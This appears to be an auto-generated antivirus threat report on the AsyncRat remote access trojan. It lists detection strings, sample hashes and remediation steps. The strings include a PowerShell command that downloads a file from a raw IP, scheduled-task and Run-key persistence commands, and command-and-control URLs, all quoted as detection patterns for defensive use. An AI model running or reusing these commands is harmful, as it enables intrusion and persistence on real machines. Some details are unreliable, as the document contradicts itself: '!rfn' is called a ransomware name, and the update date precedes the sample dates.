Backdoor:MSIL/AsyncRat!rfn - Windows Defender threat signature analysis

=== THREAT ANALYSIS REPORT ===
Threat Name: Backdoor:MSIL/AsyncRat!rfn
Classification:
 - Type: Backdoor
 - Platform: MSIL
 - Family: AsyncRat
 - Detection Type: Concrete (known malware family with identified signatures)
 - Suffix: !rfn (specific ransomware family name)
 - Confidence: Very High
 - False-Positive Risk: Low

Concrete signature match: type Backdoor (provides unauthorized remote access), platform MSIL (.NET Microsoft Intermediate Language), family AsyncRat

Summary:

This is a concrete detection of Backdoor:MSIL/AsyncRat!rfn, a sophisticated Remote Access Trojan (RAT) that grants attackers full control over the infected system. It utilizes legitimate Windows processes like MSBuild.exe and COM Surrogate for execution and evasion, establishes persistence via registry keys, and communicates with command-and-control servers for data exfiltration and further malicious activities.

Severity: Critical
VDM Static Detection:
Relevant strings associated with this threat:
 - Set ZpXcmsCQ = CreateObject("Wscript.Shell") (MACROHSTR_EXT)
 - ZpXcmsCQ.Run rdeAjnshv + lqfadUMW + AKrDsxioC, RValue (MACROHSTR_EXT)
 - Set fso = CreateObject("Scripting.FileSystemObject") (PEHSTR_EXT)
 -  & "\ (PEHSTR_EXT)
 - .xml" (PEHSTR_EXT)
 - Set object_Shell = CreateObject("Shell.Application") (PEHSTR_EXT)
 - object_Shell.ShellExecute "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",  (PEHSTR_EXT)
 - COM Surrogate (PEHSTR_EXT)
 - trevnoC.metsyS (PEHSTR_EXT)
 - CompressionMode (PEHSTR_EXT)
 - TripleDESCryptoServiceProvider (PEHSTR_EXT)
 - https://ufile.io/rftaeqtc (PEHSTR_EXT)
 - Software\Microsoft\Windows\CurrentVersion\Run (PEHSTR_EXT)
 - http://serverupdates48.ga/test (PEHSTR_EXT)
 - HttpWebRequest (PEHSTR_EXT)
 - CarRentalSystem\obj\Debug\Dash.pdb (PEHSTR_EXT)
 - crypted.exe (PEHSTR_EXT)
 - sqkpikos.pdb (PEHSTR_EXT)
 - HCS Computers & Laptops (PEHSTR_EXT)
 - Client.Install (PEHSTR_EXT)
 - GetExecutingAssembly (PEHSTR_EXT)
 - System.Windows.Forms (PEHSTR_EXT)
 - System.Reflection (PEHSTR_EXT)
 - B.text (PEHSTR_EXT)
 - setUTCMinutesTU Jurassic.Library.JSFunctionFlags (PEHSTR_EXT)
 - calc_pro.Form1.resources (PEHSTR_EXT)
 - payload.exe (PEHSTR_EXT)
 - get_Computer (PEHSTR_EXT)
 - Dotfuscated\windwos.pdb (PEHSTR_EXT)
 - windwos.My (PEHSTR_EXT)
 - 134.122.133.49 (PEHSTR_EXT)
 - Client.bin (PEHSTR_EXT)
 - Select * From Win32_ComputerSystem (PEHSTR_EXT)
 - Dotfuscated\CryptoObfuscator_Output\v4.pdb (PEHSTR_EXT)
 - v4.Resources.resources (PEHSTR_EXT)
 - windwos.pdb (PEHSTR_EXT)
 - petrolmanagementsystem.Supplier_withdraw_pump_bank_detail.resources (PEHSTR_EXT)
 - \x64\Release\WechatAnd.pdb (PEHSTR_EXT)
 - windwos\bin\Debug\Dotfuscated\windwos.pdb (PEHSTR_EXT)
 - server.Resources.resources (PEHSTR_EXT)
 - RAT\AsyncRat_0313\rat_Client\rat_pro\obj\Debug\rat_pro.pdb (PEHSTR_EXT)
 - 9ubmFjIG1hcmdvcnAgc2loVCHNTAG4Ic (PEHSTR_EXT)
 - set_UseShellExecute (PEHSTR_EXT)
 - \RatClientTest.pdb (PEHSTR)
 - Ymcfcbdts.Properties (PEHSTR_EXT)
 - Stub.g.resources (PEHSTR)
 - RunHiddenCommand (PEHSTR)
 - RawAccel.exe (PEHSTR)
 - seftali\x64\Release\seftali.pdb (PEHSTR_EXT)
 - loader\x64\Release\Espio.pdb (PEHSTR_EXT)
 - powershell(new-object System.Net.WebClient).DownloadFile('http://149.88.66.68/test.mp3','%Temp%/test.bin') (PEHSTR_EXT)
 - schtasks /create /f /sc onlogon /rl highest /tn (PEHSTR_EXT)
 - Stub.exe (PEHSTR_EXT)
 - nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS (PEHSTR_EXT)
 - Skipping Annabelle.exe (PEHSTR_EXT)
 - powershell.exe (PEHSTR_EXT)
 - ExecutionPolicy Bypass -File (PEHSTR_EXT)
 - !#HSTR:StringCodeForMshta.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.C!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.D!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.L!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.O!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRegsvr32.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRundll32.A!pli (PEHSTR_EXT)
 - rundll32 (PEHSTR_EXT)
 - !#HSTR:StringCodeForBITSJobs.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForPowerShell.G!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForScheduledTask.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForDataEncoding.D!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.J!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.K!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRemoteFileCopy.B!pli (PEHSTR_EXT)
 - !#HSTR:ExecutionGuardrails (PEHSTR_EXT)
 - !#HSTR:StringCodeForFileDeletion.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.M!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForNetshHelperDLL.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRemoteServices.A!pli (PEHSTR_EXT)
Known malware associated with this threat (filename, SHA-256, date):
 - cdff0bb80f281addc41f1e78a7326af25d024480cd47536a095d607859132053 | cdff0bb80f281addc41f1e78a7326af25d024480cd47536a095d607859132053 | 08/05/2026
 - 05b9708096e35ae64b39b02bfbd4d3e760fd294a059f783aa106d4c9cce68300 | 05b9708096e35ae64b39b02bfbd4d3e760fd294a059f783aa106d4c9cce68300 | 08/05/2026
 - Quotes & Samples 04-05-26.exe | 6c4229ac9e24a9d1444a5bc37f0d3fdb16befe906fd0005138a52ae65ccb0503 | 05/05/2026
 - xdee1f9121f3a6682101389f432b4dee709507f7ace0a.exe | dee1f9121f3a6682101389f432b4dee709507f7ace0a21d9cdbe373a40998e73 | 11/04/2026
 - fud.exe | 55179fcade854308f587291b9bb586f97758ed216a5d773610e3f5f38d25e5e9 | 05/04/2026
Remediation Steps:
 - Immediately isolate the affected host from the network.
 - Conduct a thorough forensic analysis and a full system scan with up-to-date security software.
 - Remove all detected malicious files and registry entries.
 - Verify and remove any established persistence mechanisms (e.g., Run keys).
 - Reset all potentially compromised user credentials.
 - Consider a complete system reimage for critical assets, given the extensive capabilities of RATs.
=== END REPORT ===
This analysis was last updated on 17/11/2025.